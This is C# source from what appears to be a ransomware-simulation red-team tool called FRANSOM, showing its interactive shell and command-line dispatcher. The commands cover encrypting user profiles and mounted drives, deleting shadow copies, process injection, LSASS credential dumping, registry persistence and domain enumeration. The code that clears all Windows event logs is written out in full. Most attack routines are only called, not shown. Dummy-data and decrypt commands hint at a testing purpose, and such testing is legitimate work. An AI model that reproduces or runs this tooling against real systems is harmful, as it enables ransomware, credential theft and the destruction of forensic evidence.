static void InteractiveShell()
{
string command = "";
string line = "";
int process_id;
var d = new DumpLSASS();
var p = new Persistence();
var e = new Enumerate();
var pr = new Program();
Logger.WriteLine("");
Logger.WriteLine(FiggleFonts.Doom.Render("FRANSOM v0.6"));
Logger.WriteLine("Copyright (c) 2021 Fraktal Ltd.");
Logger.WriteLine("");
while (command != "exit")
{
Logger.Write("FRANSOM> ");
command = Console.ReadLine();
Logger.WriteLine("*** Executing command: '" + command + "' ***");
switch (command)
{
case "log-on":
Logger.LogToFile(true);
break;
case "log-off":
Logger.LogToFile(false);
break;
case "help":
DisplayHelpShell();
break;
case "enumerate-user-profile":
pr.EnumerateUserProfile();
break;
case "encrypt-user-profile":
pr.EncryptUserProfile();
break;
case "decrypt-user-profile":
DecryptUserProfile();
break;
case "create-local-dummy-data":
LocalDummyDataCreation();
break;
case "cleanup-user-profile":
CleanupUserProfile();
break;
case "enumerate-mounted-drives":
pr.DoDriveEnumeration();
break;
case "encrypt-mounted-drives":
pr.DoDriveEncryption();
break;
case "decrypt-mounted-drives":
DoDriveDecryption();
break;
case "create-mounted-drives-dummy-data":
MountedDrivesDummyDataCreation();
break;
case "cleanup-mounted-drives":
DoDriveCleanup();
break;
case "enumerate-shadow-copies":
EnumerateShadowCopies();
break;
case "delete-shadow-copies":
pr.DeleteShadowCopies();
break;
case "net-assembly-injection":
pr.NetAssemblyInjection();
break;
case "kill-office-applications":
pr.KillOfficeApplications();
break;
case "thread-inject":
Logger.Write("Enter process ID: ");
line = Console.ReadLine();
if (int.TryParse(line, out process_id))
{
pr.DoThreadInjection(process_id);
}
else
{
Logger.WriteLine("The value provided is not a valid process id.");
}
break;
case "apc-inject":
Logger.Write("Enter process ID: ");
line = Console.ReadLine();
if (int.TryParse(line, out process_id))
{
DoApcInjection(process_id);
}
else
{
Logger.WriteLine("The value provided is not a valid process id.");
}
break;
case "apc-inject-new-process":
pr.DoApcInjectionNewProcess();
break;
case "remote-thread":
Logger.Write("Enter process ID: ");
line = Console.ReadLine();
if (int.TryParse(line, out process_id))
{
DoRemoteThread(process_id);
}
else
{
Logger.WriteLine("The value provided is not a valid process id.");
}
break;
case "delete-eventlogs":
pr.DeleteEventLogs();
break;
case "dump-lsass":
d.Run();
break;
case "userregkey":
p.UserRegKey();
break;
case "userregkey-clean":
p.CleanupUserRegKey();
break;
case "ps":
e.EnumerateProcesses();
break;
case "domain-users":
e.EnumerateDomainUsers();
break;
case "domain-groups":
e.EnumerateDomainGroups();
break;
case "domain-computers":
e.EnumerateDomainComputers();
break;
case "domain-trusts":
e.EnumerateDomainTrusts();
break;
case "domain-shares":
e.EnumerateDomainShares();
break;
case "exit":
break;
default:
Logger.WriteLine("Invalid command - enter \"help\" to list all available options.");
break;
}
}
}
static void Run(Options options)
{
var pr = new Program();
if (options.EnumerateUserProfile)
{
pr.EnumerateUserProfile();
}
else if (options.EncryptUserProfile)
{
pr.EncryptUserProfile();
}
else if (options.DecryptUserProfile)
{
DecryptUserProfile();
}
else if (options.CreateLocalDummyData)
{
LocalDummyDataCreation();
}
else if (options.CreateMountedDrivesDummyData)
{
MountedDrivesDummyDataCreation();
}
else if (options.CleanupUserProfile)
{
CleanupUserProfile();
}
else if (options.EnumerateMountedDrives)
{
pr.DoDriveEnumeration();
}
else if (options.EncryptMountedDrives)
{
pr.DoDriveEncryption();
}
else if (options.DecryptMountedDrives)
{
DoDriveDecryption();
}
else if (options.CleanupMountedDrives)
{
DoDriveCleanup();
}
else if (options.EnumerateShadowCopies)
{
EnumerateShadowCopies();
}
else if (options.DeleteShadowCopies)
{
pr.DeleteShadowCopies();
}
else if (options.NetAssemblyInjection)
{
pr.NetAssemblyInjection();
}
else if (options.KillOfficeApplications)
{
pr.KillOfficeApplications();
}
else if (options.ThreadInject > 0)
{
pr.DoThreadInjection(options.ThreadInject);
}
else if (options.APCInject > 0)
{
DoApcInjection(options.APCInject);
}
else if (options.APCInjectNewProcess)
{
pr.DoApcInjectionNewProcess();
}
else if (options.RemoteThread > 0)
{
DoRemoteThread(options.RemoteThread);
}
if (options.DeleteLogs)
{
foreach (var log in EventLog.GetEventLogs())
{
Logger.WriteLine("Deleting " + log.LogDisplayName);
log.Clear();
log.Dispose();
}
Logger.WriteLine("Done, all event logs gone!");
}
if (options.UserRegKey)
{
var p = new Persistence();
p.UserRegKey();
}
if (options.UserRegKeyClear)
{
var p = new Persistence();
p.CleanupUserRegKey();
}
if (options.DumpLsass)
{
var d = new DumpLSASS();
d.Run();
}
if (options.ListProcesses)
{
var e = new Enumerate();
e.EnumerateProcesses();
}
if (options.EnumDomainUsers)
{
var e = new Enumerate();
e.EnumerateDomainUsers();
}
if (options.EnumDomainGroups)
{
var e = new Enumerate();
e.EnumerateDomainGroups();
}
if (options.EnumDomainComputers)
{
var e = new Enumerate();
e.EnumerateDomainComputers();
}
if (options.EnumDomainTrusts)
{
var e = new Enumerate();
e.EnumerateDomainTrusts();
}
if (options.Shell)
{
InteractiveShell();
}
}